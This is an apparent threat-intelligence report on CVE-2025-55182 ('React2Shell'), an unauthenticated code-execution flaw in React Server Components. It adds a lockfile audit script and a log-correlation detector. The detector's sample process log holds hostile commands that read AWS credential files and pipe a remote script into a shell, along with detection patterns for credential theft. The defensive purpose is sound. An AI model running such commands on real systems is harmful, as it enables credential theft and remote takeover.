Full Report
Security community needs to rally and share more info faster, one researcher says Amid new reports of attackers pummeling a maximum security hole (CVE-2025-55182) in the React JavaScript library, Cloudflare's technology chief said his company took down its own network, forcing a widespread outage early Friday, to patch React2Shell.…
Analysis Summary
# Vulnerability: React2Shell - Critical Unauthenticated RCE in React Server Components
## CVE Details
- CVE ID: CVE-2025-55182
- CVSS Score: 10.0 (Critical)
- CWE: CWE-502, Deserialization of Untrusted Data (inferred from the description of the flaw; the source text does not name a CWE)
## Affected Systems
- Products: the React JavaScript library's React Server Components packages, and frameworks that embed them such as Next.js.
- Versions: not listed in the source text. Treat every release before the React team's fix as affected and take the exact affected and fixed ranges from the vendor advisory in References. The flaw was disclosed by the React team.
- Configurations: any server-side deployment that runs a vulnerable React Server Components runtime and accepts requests from the network.
## Vulnerability Description
The vulnerability, dubbed "React2Shell", is an insecure deserialization flaw in React Server Components: the server deserializes payloads supplied by the client, and a crafted payload lets a remote, unauthenticated attacker execute arbitrary code on the server. The early functional proof-of-concept exploits that circulated demonstrated impact by invoking Node.js primitives such as `vm#runInThisContext`, `child_process#exec` and `fs#writeFile`. Those calls are the attacker's chosen payload, not the vulnerable surface, so an application that contains no such code is not thereby safe; what matters is whether the vulnerable deserializer is reachable.
## Exploitation
- Status: Exploited in the wild. The UK government warned of active exploitation and CISA added the CVE to its Known Exploited Vulnerabilities (KEV) catalog. Threat actors, reportedly including China state-nexus groups, are scanning for vulnerable endpoints, harvesting credentials (for example AWS configuration and credential files) and installing downloaders.
- Complexity: Low. No authentication or user interaction is required, and functional PoCs circulated within days of disclosure.
- Attack Vector: Network (remote, unauthenticated).
## Impact
- Confidentiality: High (Confirmed attempts reported include theft of configuration and credential files).
- Integrity: High (Ability to execute arbitrary code).
- Availability: High (arbitrary code execution lets an attacker crash, disable or repurpose the service). Separately, the Cloudflare outage shows the operational risk of emergency mitigation rolled out under pressure; that outage was a consequence of the response, not of the vulnerability itself.
## Remediation
### Patches
- Specific fixed versions are not listed in the source text. Apply the fixes released by the React team and by affected frameworks such as Next.js, taking the version numbers from the vendor advisory in References. Check nested and vendored copies of the React Server Components packages as well as the top-level dependency: a lockfile can carry more than one copy, and only the copy the server actually loads matters.
### Workarounds
- No vendor workaround is given in the source text; the only mitigation described is patching. The Cloudflare outage, which occurred while a mitigation was being deployed, shows that even an urgent change needs a staged rollout and a tested rollback path.
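One way to find the affected packages in a deployment, as an added example that is not part of the original report and not code from the React or Next.js projects: the script below walks an npm lockfile (lockfileVersion 2 or 3), lists every copy of the React Server Components packages, including nested copies, and compares each against a per-line fixed patch level. The package set and the threshold table are assumptions for this example: the react-server-dom-* thresholds are the first patched releases named in the React advisory linked under References (19.0.1, 19.1.2, 19.2.1) and must be verified against that advisory before use, and Next.js is deliberately reported as "review" rather than given a threshold. The lockfile is constructed for the demo.

```python
import json
import re

# Packages that ship or bundle the React Server Components runtime.
# This set is an assumption for the example; extend it from the vendor advisory.
RSC_PACKAGES = {
    "react-server-dom-webpack",
    "react-server-dom-parcel",
    "react-server-dom-turbopack",
    "next",
}

# First patched patch-level per major.minor line for the react-server-dom-*
# packages, as published in the React team's advisory (19.0.1, 19.1.2, 19.2.1).
# Verify against the advisory before relying on it. Next.js has its own fixed
# releases and is intentionally left out so it is reported for manual review.
FIXED_PATCH_LEVEL = {
    "react-server-dom-webpack": {(19, 0): 1, (19, 1): 2, (19, 2): 1},
    "react-server-dom-parcel": {(19, 0): 1, (19, 1): 2, (19, 2): 1},
    "react-server-dom-turbopack": {(19, 0): 1, (19, 1): 2, (19, 2): 1},
}

VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")


def parse_version(version):
    """Return (major, minor, patch); prerelease and build suffixes are ignored."""
    m = VERSION_RE.match(version)
    if not m:
        raise ValueError(f"unparseable version string: {version!r}")
    return tuple(int(x) for x in m.groups())


def classify(name, version):
    """Classify one installed package as 'patched', 'vulnerable' or 'review'."""
    thresholds = FIXED_PATCH_LEVEL.get(name)
    if thresholds is None:
        return "review"  # no threshold table: check the vendor advisory by hand
    major, minor, patch = parse_version(version)
    first_fixed = thresholds.get((major, minor))
    if first_fixed is None:
        return "review"  # major.minor line not covered by the table
    return "patched" if patch >= first_fixed else "vulnerable"


def audit_lockfile(lock):
    """Walk the 'packages' map of an npm lockfile (lockfileVersion 2/3) and
    classify every RSC-related entry, including copies nested under other
    packages, which a top-level 'npm ls' style check would miss."""
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if not path or "version" not in meta:
            continue  # "" is the root project entry; link entries have no version
        name = path.rsplit("node_modules/", 1)[-1]
        if name in RSC_PACKAGES:
            findings.append({
                "path": path,
                "name": name,
                "version": meta["version"],
                "status": classify(name, meta["version"]),
            })
    return findings


# Constructed sample lockfile (not from a real project): a patched top-level
# copy of react-server-dom-webpack and a stale nested copy under next.
SAMPLE_LOCK = json.loads("""{
  "name": "demo-app", "lockfileVersion": 3,
  "packages": {
    "": {"name": "demo-app", "dependencies": {"next": "15.x"}},
    "node_modules/react": {"version": "19.2.1"},
    "node_modules/react-server-dom-webpack": {"version": "19.2.1"},
    "node_modules/next": {"version": "15.5.0"},
    "node_modules/next/node_modules/react-server-dom-webpack": {"version": "19.1.1"}
  }
}""")

if __name__ == "__main__":
    for f in audit_lockfile(SAMPLE_LOCK):
        print(f"{f['status']:<10} {f['name']}@{f['version']}  ({f['path']})")
```

Run it against a real `package-lock.json` by replacing `SAMPLE_LOCK` with `json.load(open("package-lock.json"))`. Anything reported as "review" still needs a manual comparison against the advisory; the script only settles the lines it has thresholds for.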
## Detection
- Indicators of Compromise (IoCs): scanning and reconnaissance against React Server Components endpoints; attempts to read configuration and credential files on the application host (for example AWS credential files); downloaders that contact external command-and-control infrastructure after exploitation.
- Detection methods and tools: monitor server and proxy logs for POST traffic to the server-function endpoint that does not match the application's own client behaviour, and correlate it with unexpected child processes of the Node.js server (shells, `curl`/`wget`, reads of credential files). Security providers are actively updating detection rules.
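The correlation described above, as an added example that is not part of the original report: the detector below reads two constructed log sources, an HTTP request log and a host-agent process log, and raises a low-severity alert for server-function POSTs whose action identifier is not one the deployed build exports, and a high-severity alert when such a POST is followed within a short window by a node-spawned shell that reads credential files or fetches remote content. It assumes the Next.js convention of a `Next-Action` request header marking server-function calls (other React Server Components hosts differ), and the log formats, the known action ID set, the file patterns and the correlation window are all assumptions chosen for the example.

```python
import json
import re
from datetime import datetime

# Constructed sample logs (not real traffic). Request log: one JSON object per
# line, as an edge proxy or app server might emit. Process log: child-process
# events from a host agent on the app server. Timestamps are UTC ISO-8601.
REQUEST_LOG = """\
{"ts":"2025-12-05T10:00:01Z","src":"203.0.113.7","method":"POST","path":"/","headers":{"next-action":"7f3a9c0e2b1d4a5f"},"status":200}
{"ts":"2025-12-05T10:00:05Z","src":"198.51.100.22","method":"GET","path":"/dashboard","headers":{},"status":200}
{"ts":"2025-12-05T10:01:10Z","src":"203.0.113.7","method":"POST","path":"/api/login","headers":{"next-action":"7f3a9c0e2b1d4a5f"},"status":200}
{"ts":"2025-12-05T10:02:00Z","src":"192.0.2.9","method":"POST","path":"/","headers":{"next-action":"deadbeefcafef00d"},"status":500}
"""

PROCESS_LOG = """\
{"ts":"2025-12-05T10:00:02Z","ppname":"node","cmd":"sh -c cat /root/.aws/credentials"}
{"ts":"2025-12-05T10:00:03Z","ppname":"node","cmd":"sh -c curl -s http://203.0.113.7/x.sh | sh"}
{"ts":"2025-12-05T10:00:30Z","ppname":"node","cmd":"sh -c npm run build"}
"""

# Action IDs the deployed build actually exports (constructed for the example).
# For an app that defines no server functions this set is empty, and every
# Next-Action request is then suspect.
KNOWN_ACTION_IDS = {"7f3a9c0e2b1d4a5f"}

# Example patterns; extend to the credential stores present on your hosts.
CRED_FILE_RE = re.compile(r"\.aws/(credentials|config)|\.env\b|\.git-credentials")
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b.*https?://")
CORRELATION_WINDOW_S = 120


def parse_ts(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def load_jsonl(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def server_function_requests(requests):
    """Return (request, action_id) for POSTs that carry a Next-Action header,
    i.e. requests that reach the server-function endpoint (Next.js convention)."""
    out = []
    for r in requests:
        if r.get("method") != "POST":
            continue
        headers = {k.lower(): v for k, v in r.get("headers", {}).items()}
        action = headers.get("next-action")
        if action is not None:
            out.append((r, action))
    return out


def suspicious_processes(events):
    """Shell children of the node process that touch credential files or fetch
    remote content: the post-exploitation behaviour reported for this CVE."""
    hits = []
    for e in events:
        if e.get("ppname") != "node":
            continue
        cmd = e.get("cmd", "")
        if CRED_FILE_RE.search(cmd):
            hits.append((e, "credential-file-access"))
        elif DOWNLOADER_RE.search(cmd):
            hits.append((e, "remote-download"))
    return hits


def detect(request_text, process_text, known_ids):
    """Return alerts: unknown action IDs (low) and server-function POSTs
    followed within CORRELATION_WINDOW_S by suspicious node children (high)."""
    requests = load_jsonl(request_text)
    procs = suspicious_processes(load_jsonl(process_text))
    alerts = []
    for r, action in server_function_requests(requests):
        t0 = parse_ts(r["ts"])
        if action not in known_ids:
            alerts.append({"severity": "low", "src": r["src"], "ts": r["ts"],
                           "reason": f"unknown server action id {action}"})
        followed = sorted({tag for e, tag in procs
                           if 0 <= (parse_ts(e["ts"]) - t0).total_seconds()
                           <= CORRELATION_WINDOW_S})
        if followed:
            alerts.append({"severity": "high", "src": r["src"], "ts": r["ts"],
                           "reason": "server-function POST followed by "
                                     + ", ".join(followed)})
    return alerts


if __name__ == "__main__":
    for a in detect(REQUEST_LOG, PROCESS_LOG, KNOWN_ACTION_IDS):
        print(f"[{a['severity']}] {a['ts']} {a['src']}: {a['reason']}")
```

Populate the known-ID set from whatever manifest of exported server references the framework build emits; if none is available, leave the set empty and treat the low-severity rule as a volume indicator rather than a verdict. The high-severity rule carries the weight: a legitimate server action will not normally cause the server process to spawn a shell that reads credential files or pulls a script from a remote host.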
## References
- Vendor Advisory (React Team Disclosure): hXXps://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
- CISA KEV Catalog Addition: hXXps://www.cisa.gov/news-events/alerts/2025/12/05/cisa-adds-one-known-exploited-vulnerability-catalog
- Cloudflare Outage Explanation: hXXps://blog.cloudflare.com/5-december-2025-outage/
- Researcher POC: hXXps://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc
- Public PoC Example: hXXps://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3